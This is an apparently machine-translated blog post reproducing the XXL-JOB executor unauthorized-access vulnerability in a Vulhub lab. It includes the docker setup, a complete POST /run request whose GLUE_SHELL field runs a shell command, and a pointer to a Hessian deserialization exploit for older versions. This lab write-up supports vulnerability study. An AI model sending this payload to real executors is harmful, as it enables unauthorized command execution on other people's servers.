当前位置:网站首页>Vulhub vulnerability recurrence 76_ XXL-JOB
Vulhub vulnerability recurrence 76_ XXL-JOB
2022-07-04 06:56:00 【Revenge_ scan】
XXL-JOB executor Unauthorized access vulnerability
Vulnerability Details
XXL-JOB Is a distributed task scheduling platform , Its core design goal is rapid development 、 Learn easy 、 Lightweight 、 Easy to expand . Now open source and access to a number of companies online product lines , Open the box .XXL-JOB It is divided into admin and executor Both ends , The former is the background management page , The latter is the client of task execution .executor Authentication is not configured by default , An unauthorized attacker can pass through RESTful API Execute arbitrary orders .
Reference link :
- https://mp.weixin.qq.com/s/jzXIVrEl0vbjZxI4xlUm-g
- https://landgrey.me/blog/18/
- https://github.com/OneSourceCat/XxlJob-Hessian-RCE
Environment building
shooting range :192.168.4.10_ubuntu
Execute the following command to start 2.2.0 Version of XXL-JOB:
#docker-compose up -d
After the environment starts , visit `http://your-ip:8080` You can view the management side (admin), visit `http://your-ip:9999` Can view the client (executor).
Loophole recurrence
Directly to the client (executor) Send the following packets , You can execute the command :
```
POST /run HTTP/1.1
Host: your-ip:9999
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.132 Safari/537.36
Connection: close
Content-Type: application/json
Content-Length: 365
{
"jobId": 1,
"executorHandler": "demoJobHandler",
"executorParams": "demoJobHandler",
"executorBlockStrategy": "COVER_EARLY",
"executorTimeout": 0,
"logId": 1,
"logDateTime": 1586629003729,
"glueType": "GLUE_SHELL",
"glueSource": "touch /tmp/success",
"glueUpdatetime": 1586699003758,
"broadcastIndex": 0,
"broadcastTotal": 0
}
```
`touch /tmp/success` Has been successfully executed :
in addition , lower than 2.2.0 Version of XXL-JOB No, RESTful API, We can go through [Hessian Deserialization ](https://github.com/OneSourceCat/XxlJob-Hessian-RCE) To execute an order .
边栏推荐
- 测试用例的设计
- Mysql 45讲学习笔记(七)行锁
- A new understanding of how to encrypt industrial computers: host reinforcement application
- MySQL relearn 2- Alibaba cloud server CentOS installation mysql8.0
- uniapp 自定義環境變量
- Uniapp applet subcontracting
- The important role of host reinforcement concept in medical industry
- What is the "relative dilemma" in cognitive fallacy?
- C # symmetric encryption (AES encryption) ciphertext results generated each time, different ideas, code sharing
- 2022 wechat enterprise mailbox login entry introduction, how to open and register enterprise wechat enterprise mailbox?
猜你喜欢
what the fuck! If you can't grab it, write it yourself. Use code to realize a Bing Dwen Dwen. It's so beautiful ~!
移动适配:vw/vh
Responsive - media query
Wechat applet scroll view component scrollable view area
Shopping malls, storerooms, flat display, user-defined maps can also be played like this!
Download kicad on Alibaba cloud image station
How to share the source code anti disclosure scheme
[Valentine's day] - you can change your love and write down your lover's name
Su Weijie, a member of Qingyuan Association and an assistant professor at the University of Pennsylvania, won the first Siam Youth Award for data science, focusing on privacy data protection, etc
【问题记录】03 连接MySQL数据库提示:1040 Too many connections
随机推荐
How to share the source code anti disclosure scheme
Analysis of tars source code 1
移动适配:vw/vh
How can the old version of commonly used SQL be migrated to the new version?
MySQL 45 lecture learning notes (12) MySQL will "shake" for a while
Tar source code analysis Part 3
what the fuck! If you can't grab it, write it yourself. Use code to realize a Bing Dwen Dwen. It's so beautiful ~!
期末周,我裂开
【问题记录】03 连接MySQL数据库提示:1040 Too many connections
Mysql 45讲学习笔记(十二)MySQL会“抖”一下
2022年,或許是未來10年經濟最好的一年,2022年你畢業了嗎?畢業後是怎麼計劃的?
【MySQL】数据库视图的介绍、作用、创建、查看、删除和修改(附练习题)
测试用例的设计
the input device is not a TTY. If you are using mintty, try prefixing the command with ‘winpty‘
Redis interview question set
内卷怎么破?
Download kicad on Alibaba cloud image station
What is industrial computer encryption and how to do it
[GF (q) + LDPC] regular LDPC coding and decoding design and MATLAB simulation based on the GF (q) field of binary graph
Data analysis notes 09